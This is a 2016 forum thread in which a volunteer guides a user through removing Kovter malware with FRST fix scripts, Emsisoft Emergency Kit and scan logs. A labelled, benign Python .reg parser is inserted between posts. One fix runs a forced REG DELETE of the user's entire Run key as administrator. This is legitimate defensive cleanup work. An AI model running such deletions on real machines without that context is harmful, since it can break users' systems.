[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.286] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2016.10.18 21:01:31.286] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.286] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2016.10.18 21:01:31.287] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing value [ServerExecutable] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing value [ServerExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2016.10.18 21:01:31.287] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2016.10.18 21:01:31.287] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2016.10.18 21:01:31.287] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2016.10.18 21:01:31.287] - INFO: (XSW) Scanning for XSW variant...
[2016.10.18 21:01:31.378] - INFO: (XSW) Processing users subkeys...
[2016.10.18 21:01:31.382] - INFO: Win32/Poweliks not found
[2016.10.18 21:01:43.293] - End
 

 

I uploaded the Upload.zip file using the link provided.

After running FRST, ESET and restarting, Viruscan on access scanner still detects two Powelike!lnk and one Powelike!bat

I appreciate your help on this.  Thank you!



#4 Aura

Posted 19 October 2016 - 07:04 AM

FRST failed to delete the Poweliks-related Run entries, so we'll go at it another way. Follow the instructions below please.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CMD: reg export "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" "%userprofile%\Desktop\Export.txt"
    
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
  • A file called Export.txt will be located on your desktop. Open it, and copy/paste its content in your next reply as well;

Edited by Aura, 19 October 2016 - 11:50 AM.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 pmate888

Posted 20 October 2016 - 12:21 AM

Hi Aura

Thank you for your prompt reply.  I ran FRST fix as instructed and the contents of the Fixlog.txt file are:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (19-10-2016 19:13:12) Run:3
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CMD: reg export "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" "%userprofile%\Desktop\Export.txt"
*****************


========= reg export "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" "%userprofile%\Desktop\Export.txt" =========

The operation completed successfully.


========= End of CMD: =========


==== End of Fixlog 19:13:13 ====

 

 

The contents of the Export.txt file are:

 

Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"swg"="\"C:\\Program Files (x86)\\Google\\GoogleToolbarNotifier\\GoogleToolbarNotifier.exe\""
 

 

After running the FRST fix, the Viruscan On-Access scan still detects Powelike!lnk and Powelike!bat.

Appreciate your help, thank you!



#6 Aura

Posted 20 October 2016 - 06:53 AM

I call it a FRST fix because that's what it is, though it doesn't mean that it'll fix anything. In that case, I simply used it to export a Registry key :) Now we'll be running a "real" FRST fix to try to get rid of Kovter (because this is Kovter, not Poweliks, thanks to Toffee for the heads-up).

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    
    REG: REG DELETE "HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" /f
    DeleteKey: HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run
    
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
  • Restart your computer;

Once done, download the attached Script.reg and double-click on it. It'll ask you if you want to merge the changes in your Registry. Accept, and let me know if you get an error or success message after that.

Do you still get warnings about Poweliks.lnk and Poweliks!bat after that?

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 pmate888

Posted 21 October 2016 - 02:31 AM

Hi Aura

Thank you for your reply.  I ran FRST fix and it created Fixlog.txt file as you said.  The contents of the file are:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (20-10-2016 20:52:43) Run:4
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:

REG: REG DELETE "HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" /f
DeleteKey: HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run
*****************

Processes closed successfully.

========= REG DELETE "HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" /f =========

The operation completed successfully.



========= End of Reg: =========

HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run => key not found.


The system needed a reboot.

==== End of Fixlog 20:52:47 ====

 

 

After reboot, Viruscan on-access scanner did not detect Powelike!lnk or Powelike!bat.

I downloaded and double clicked on Script.reg as instructed and allowed it to make changes to registry.

An error message appeared and it said:  "Cannot input C:\users\Wayne\Desktop\Script.reg: The specified file is not a registry script. You can only input binary registry files from within the registry editor."

After running Script.reg and getting the error message, Viruscan on-access scan has still not detected Powelike!lnk or Powelike!bat or anything else.  Awesome!!  Seems to be fixed - is there anything else I need to do?

Thank you so much for your help!



#8 Aura

Posted 21 October 2016 - 07:12 AM

Sorry I forgot to add the word "Version" to the script. Try this one, it should work. And we'll run Emsisoft Emergency Kit to check for remnants and grab a fresh pair of FRST logs too.

Emsisoft Emergency Kit
Follow the instructions below to run a scan using the Emsisoft Emergency Kit.
  • Download the Emsisoft Emergency Kit and execute it. From there, click on the Extract button to extract the program in the EEK folder;
  • Once the extraction is complete, Emsisoft Emergency Kit will open, and suggest that you run an online update before using the program. Click on Yes to launch it.
  • After the update, click on Malware Scan under 2. Scan and accept to let Emsisoft Emergency Kit detect PUPs (click on Yes).
  • Once the scan is complete, make sure that every item in the list is checked, and click on Quarantine selected;
  • If it asks you for a reboot to delete some items, click on Ok to reboot automatically;
  • After the restart, click on the Start Emsisoft Emergency Kit icon again on your desktop to open it;
  • This time, click on Logs;
  • From there, go under the Quarantine Log tab, and click on the Export button;
  • Save the log on your desktop, then open it, and copy/paste its content in your next reply;

Farbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • Click on the Scan button;
  • On completion, two message boxes will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files;
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply;
How's your computer running now?

Your next reply(ies) should include:
  • Confirmation that the Script.reg merged successfully in your Registry;
  • Copy/pasted content of EEK's clean log;
  • Copy/pasted content of FRST.txt;
  • Copy/pasted content of Addition.txt;
  • Answer to my question about your computer's current state;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.
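
Added example, not part of the thread and not code from FRST or regedit: a small Python reader for text .reg files that applies the first-line check behind the "not a registry script" error in post #7 (post #8 attributes it to the missing word "Version") and lists the Run values in an export such as the Export.txt in post #5. The broken script below is a constructed guess at what such a header looks like, and all function names are this example's own.

```python
import re

# First lines regedit accepts for a text registry script.
VALID_HEADERS = ("Windows Registry Editor Version 5.00", "REGEDIT4")

# Export.txt exactly as posted in post #5 of the thread.
EXPORT_TXT = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"swg"="\"C:\\Program Files (x86)\\Google\\GoogleToolbarNotifier\\GoogleToolbarNotifier.exe\""
'''

# Constructed sample (assumption): a script whose header lacks the word "Version".
BROKEN_SCRIPT = r'''Windows Registry Editor 5.00

[HKEY_CURRENT_USER\Software\ExampleKey]
"ExampleValue"="1"
'''

SECTION = re.compile(r'^\[(.+)\]$')
VALUE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
STRING = re.compile(r'^"((?:[^"\\]|\\.)*)"$')


class RegFormatError(ValueError):
    """The text is not a registry script (bad or missing header line)."""


def decode_reg(raw: bytes) -> str:
    """Decode .reg bytes: UTF-16 with a BOM (what reg export writes) or 8-bit text."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


def _unescape(s: str) -> str:
    # .reg strings escape backslash and double quote with a leading backslash.
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text: str) -> dict:
    """Return {key path: {value name: data}}; raise RegFormatError on a bad header."""
    body = [ln.strip() for ln in text.lstrip("\ufeff").splitlines()]
    first = next((ln for ln in body if ln), "")
    if first not in VALID_HEADERS:
        raise RegFormatError(f"not a registry script: first line is {first!r}")
    keys, current = {}, None
    i = body.index(first) + 1
    while i < len(body):
        line = body[i]
        i += 1
        if not line or line.startswith(";"):
            continue  # blank line or comment
        m = SECTION.match(line)
        if m:
            # A leading '-' inside the brackets (key deletion) is kept in the name.
            current = keys.setdefault(m.group(1), {})
            continue
        m = VALUE.match(line)
        if not m or current is None:
            continue
        name, data = m.group(1), m.group(2)
        # hex: values continue on the next line when the line ends with '\'.
        while data.endswith("\\") and not data.startswith('"') and i < len(body):
            data = data[:-1] + body[i]
            i += 1
        name = "(Default)" if name == "@" else _unescape(name[1:-1])
        s = STRING.match(data)
        # String data is unescaped; dword:/hex: data is kept as written.
        current[name] = _unescape(s.group(1)) if s else data
    return keys


def run_entries(keys: dict) -> list:
    """List (key, value name, command) for every ...\\CurrentVersion\\Run key."""
    out = []
    for key, values in keys.items():
        if key.lower().endswith(r"\currentversion\run"):
            out.extend((key, n, d) for n, d in values.items())
    return out


if __name__ == "__main__":
    for key, name, cmd in run_entries(parse_reg(EXPORT_TXT)):
        print(f"{name}: {cmd}")
    try:
        parse_reg(BROKEN_SCRIPT)
    except RegFormatError as exc:
        print("rejected:", exc)
```
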


#9 pmate888

Posted 22 October 2016 - 04:10 AM

Hi Aura

I downloaded and ran Script.reg as instructed and it displayed the following message:  "The keys and values contained in C:\Users\Wayne\Desktop\Script.reg have been successfully added to the registry."

I ran EEK malware scan as instructed and exported the quarantine log.  The contents of the Quarantine_161021-215939.txt file are:

 

Emsisoft Emergency Kit - Version 11.9
Quarantine log

Date    Source    Event    Detection    
10/21/2016 9:57:28 PM    C:\ProgramData\partner    Moved to quarantine    Application.AppInstall (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLETASKMGR    Moved to quarantine    Setting.DisableTaskMgr (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS    Moved to quarantine    Setting.DisableRegistryTools (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER -> NORUN    Moved to quarantine    Setting.NoRun (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER -> NOFOLDEROPTIONS    Moved to quarantine    Setting.NoFolderOptions (A)    
10/21/2016 9:57:28 PM    Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\PROTECTOR_DLL.PROTECTORBHO    Moved to quarantine    Application.AdReg (A)    
10/21/2016 9:57:27 PM    Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\PROTECTOR_DLL.PROTECTORBHO.1    Moved to quarantine    Application.AdReg (A)    
 

 

I ran FRST scan as instructed and it generated the FRST.txt and Addition.txt files.  The contents of the FRST.txt file are:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by Wayne (administrator) on WWX220 (21-10-2016 22:02:51)
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Intel® Corporation) C:\Program Files\Intel\CAM\bin\CAMService.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Lenovo.) C:\Windows\System32\TpShocks.exe
() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\McTray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SRORest.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
() C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380776 2011-01-14] (Lenovo.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2011-03-14] (Conexant systems, Inc.)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63656 2016-02-19] (Lenovo)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [113656 2013-07-02] (Intel Corporation)
HKLM-x32\...\Run: [PWMTRV] => C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL [6422696 2016-04-14] (Lenovo Group Limited)
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337440 2013-12-04] (McAfee, Inc.)
HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [244080 2015-08-20] (McAfee, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1156824 2016-09-16] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-23] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{BBACEA73-8644-4A74-A026-251E28C5AC0C}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{F3EAF862-B2B2-4EA5-8BBC-6869F9E0D984}: [DhcpNameServer] 24.25.227.55 209.18.47.61

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=LENP&bmod=LENP
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://www.lenovo.com/welcome/thinkpad
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458
SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)
